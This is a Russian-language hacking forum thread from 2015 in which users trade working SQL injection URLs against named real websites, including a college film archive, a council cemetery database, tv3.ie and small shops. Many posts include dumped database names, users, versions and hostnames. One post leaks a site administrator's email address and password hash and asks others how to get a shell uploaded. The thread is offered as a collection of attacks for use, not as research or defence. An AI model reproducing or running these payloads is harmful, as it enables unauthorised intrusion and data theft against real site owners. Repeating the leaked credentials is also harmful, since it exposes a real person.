 |
|
05.07.2015, 18:56
|
|
Познавший АНТИЧАТ
Регистрация: 23.04.2012
Сообщений: 1,109
С нами:
7396886
Репутация:
231
|
|
Код:
https://www.tcd.ie/irishfilm/print.php?search=keyword&q=radharc&exactMatch=&extraSearch=-8628 OR 1 GROUP BY CONCAT(0x716b716271,(SELECT (CASE WHEN (2226=2226) THEN 1 ELSE 0 END)),0x7170787871,FLOOR(RAND(0)*2)) HAVING MIN(0)#
tcd.ie трафф 1.2kk колледж Ирландии
error based
Apache 2.4.10;MySQL >= 5.0.0
Database: filmresearch_db
[6 tables]
+-----------------+
| bibliography |
| biography |
| censor_appeal |
| censor_decision |
| censor_film |
| film |
+-----------------+
Код:
http://bgequipment.powweb.com:80/service_detail.php?ID=1' AND (SELECT 1856 FROM(SELECT COUNT(*),CONCAT(0x716b767171,(SELECT (ELT(1856=1856,1))),0x7176716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'GkPg'='GkPg
powweb.com трафф разный
error based
PHP 5.3.29, Apache 2;MySQL >= 5.0.0
available databases [2]:
[*] bges
[*] information_schema |
|
|
05.07.2015, 19:56
|
|
Познающий
Регистрация: 08.06.2015
Сообщений: 50
С нами:
5753846
Репутация:
11
|
|
Код:
http://rid.waipadc.govt.nz/cemetery/cemetery_record_view.php?id=-2774+union+select+1,concat_ws%280x3c62723e,version%28%29,database%28%29,user%28%29%29,NULL,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+--+
cemetery@aoraki.webbase.net.nz;
5.0.51a-24+lenny5-log;
cemetery |
|
|
|
06.07.2015, 17:56
|
|
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами:
9176038
Репутация:
8
|
|
Код:
http://www.polarview.aq/old/tablelisting_SAR.php?hemi=S&time=Last+week&area=NewZealand'+and+ascii(substr(version(),6,1))>'113'+and+concat(1,1,1)='111
Ничего интересного, просто "обычная" PostgreSQL инъекция на одном из сайтов Антарктиды. Проходите дальше. |
|
|
|
10.07.2015, 07:02
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
С нами:
8417383
Репутация:
0
|
|
ASP, MS-SQL
Тип атаки: Convert INT ODBC Error
Код:
Версия - http://nchla.org/issues.asp?ID=1+and+1=convert(int,@@version)--
Код:
Пользователь http://nchla.org/issues.asp?ID=1+and+1=convert(int,user_name())--
Код:
База данных http://nchla.org/issues.asp?ID=1+and+1=convert(int,db_name())--
Код:
Перебираем имена баз данных
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(0))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(1))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(2))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(3))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(4))--
http://nchla.org/issues.asp?ID=1+and+1=convert(int,DB_NAME(5))--
Ну и дамп
 |
|
|
|
10.07.2015, 15:51
|
|
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами:
9650336
Репутация:
662
|
|
PR7
Код:
http://www7.inra.fr/drh/cr2013/listeparconcours-cr2.php?choix=8&langue=FR+union+select+1,2,3,4,user(),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+--+
|
|
|
|
16.07.2015, 15:28
|
|
Участник форума
Регистрация: 10.05.2015
Сообщений: 142
С нами:
5795606
Репутация:
57
|
|
Код:
http://www.compactkitchens.in/productdetail.php?cat_id=.37' and @pipka:=(
(SELECT+GROUP_CONCAT(/*!12345table_name*/,0x2020203a3a3a2020,/*!12345column_name*/+SEPARATOR+0x3c62723e)+FROM+
/*!50000INFORMATION_SCHEMA.columns*/+WHERE+TABLE_SCHEMA=DATABASE/**/()))/*!50000UNIOn*/ SELECT 1,2,3,4,5,6,
concat/**/(0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE/**/(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version/**/(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,@pipka),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- -
Код:
http://www.ilovemusica.com/shop.php?cat=.6 UNION SELECT concat(0x3c2f7469746c653e,0x3c63656e7465723e,
0x3c7370616e207374796c653d22666f6e742d66616d696c793a4963656c616e643b636f6c6f723a7265643b73697a653a353b746578742d736861646f773a23303030203070782030707820337078223e4d69737465725f42657274306e693c62723e,
0x4461746162617365203a3a202020,DATABASE(),
0x3c62723e506f727420203a3a2020,@@PORT,
0x3c62723e46696c6573797374656d203a3a2020,@@VERSION_COMPILE_OS,0x20203a3a2020,
@@VERSION_COMPILE_MACHINE,
0x3c62723e56657273696f6e206f66204461746162617365203a3a2020,version(),0xa3c62723e486f73746e616d65203a3a20,
@@HOSTNAME,
0x3c2f7370616e3e,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),0x3c212d2d),null -- -
|
|
|
|
19.07.2015, 01:44
|
|
Новичок
Регистрация: 08.04.2010
Сообщений: 1
С нами:
8469890
Репутация:
0
|
|
Еще...
Вывод в алерте
Код:
http://www.agriagency.com.ua/comments/10227.html'or(ExtractValue(1,concat(0x3a,(select(version())))))='1
|
|
|
|
23.07.2015, 17:16
|
|
Постоянный
Регистрация: 26.12.2007
Сообщений: 353
С нами:
9671366
Репутация:
332
|
|
ВНИМАНИЕ !!! Все инъекции заключаем в тег [ CODE ] [ / CODE ], ни каких [ URL ] [ / URL ] быть не должно.
Инъекции в POST выкладываем тоже в [ CODE ] [ /CODE ]
Код:
http://site.zone/index.php?cmd=viewpost
POST:
id=-1'+and+1=2+union+select+1,2,3,4,5,version(),7,8+--+
Текст в [ URL ] [ /URL ] урезается по длинне и становится не удобным для чтения, в отличии от [ CODE] [ /CODE ] |
|
|
|
28.07.2015, 15:34
|
|
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
С нами:
9644530
Репутация:
443
|
|
Код:
http://www.tv3.ie/news_sub_page.php?locID=1.2.888000+union+select+concat_ws(0x3a3a,version(),user(),database())--
Version: 5.0.95-log
user : tv3_readonly@localhost
database: tv3 |
|
|
|
30.07.2015, 09:11
|
|
Новичок
Регистрация: 25.03.2013
Сообщений: 2
С нами:
6913046
Репутация:
5
|
|
Привет все!
Дырка есть базу выдает но там joomla 3.3.1 хеш с солью высыпает
И фильтр не пропускает логин админа(((
Код:
http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=1'
Там только перебор бессмысленный сразу инжектировать нужно
Я через софт Havij v1.16 скачал базу
Код:
Target: http://orange-gorodok.ru/modules/mod_6contacts/helper.php?modId=%Inject_Here%
Host IP: 91.236.136.194
Web Server: nginx
DB Server: MySQL error based
Resp. Time(avg): 85 ms
Sql Version: 5.5.43-0+deb7u1-log
Compile OS: debian-linux-gnu
Host Name: ura.webhost1.ru
Current DB: sergei62_og
Installation dir: /usr
данные админа
povar.admin@gmail.com
$2y$10$C8P2iexVqWIKqMUmxhOpCeCTsx9MwInyzBOwShbI/VeDdR47XEvzO
Залить не получилось(( не нашел пути
Кто сможет раскопать отпишите в личку (Как удалось?)
P.S. на сервере фильтрация на количество запросов в минуту! Так что не спишите))) |
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
